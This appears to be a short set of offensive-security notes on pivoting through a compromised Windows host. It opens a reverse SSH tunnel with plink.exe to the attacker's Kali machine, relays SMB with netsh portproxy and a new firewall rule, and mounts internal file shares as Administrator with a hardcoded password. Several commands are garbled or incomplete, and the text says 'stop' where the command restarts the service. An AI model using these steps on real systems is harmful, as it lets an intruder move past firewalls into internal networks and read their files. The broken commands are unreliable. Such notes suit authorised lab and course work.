Port forwarding Windows

netstat -anpb TCP

and see that there's another service running bit firewall is stopping us from connecting to it.

you can transfer plink.exe (windows command line SSH client)

cmd.exe /c echo y | plink.exe -ssh -l kali -pw pass -R kali_IP:1234: running on windows) kali_IP

if it works, we can do a quick nmap scan to confirm:

nmap -sS -sV -p 1234


Using SYSTEM level shell to pivot through with NETSH

-netsh is installed on most windows

  • it has to have the IP Helper service running and IPv6 support enabled (can be confirmed on windows Services & network interfaces settings)

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=current_IP connectport=445 connectaddress=other_network_IP

add firewall rule

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=current_IP localport=4455 action=allow

on kali, we stop the smb service

sudo /etc/init.d/smbd restart

smbclient -L target_IP(compromised) --port=4455 --user=Administrator

then try to mount file shares

sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 // -o username=Administrator,password=Qwerty09! /mnt/win10_share
ls -l /mnt/win10_share/
cat /mnt/win10_share/data.txt

Last updated